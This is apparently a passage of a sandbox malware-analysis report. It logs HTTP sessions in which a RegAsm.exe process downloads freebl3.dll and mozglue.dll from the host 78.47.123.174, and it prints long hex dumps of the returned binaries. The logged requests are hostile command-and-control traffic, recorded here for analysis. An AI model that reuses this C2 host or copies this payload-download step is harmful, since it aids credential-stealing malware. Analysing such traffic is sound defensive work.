                                                                          Date: Wed, 22 May 2024 16:28:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.64971178.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:13 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:13 UTC246INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:13 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 685392
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-a7550"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:13 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                          Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                          Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                          Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                          Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                          Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                          Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                          Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                          Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                          2024-05-22 16:28:13 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                          Data Ascii: 0<48%8A)$(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.64971578.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:14 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:15 UTC246INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:15 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 608080
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-94750"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:15 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                          Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                          Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                          Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                          Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                          Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                          Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                          2024-05-22 16:28:15 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                          Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.64971778.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
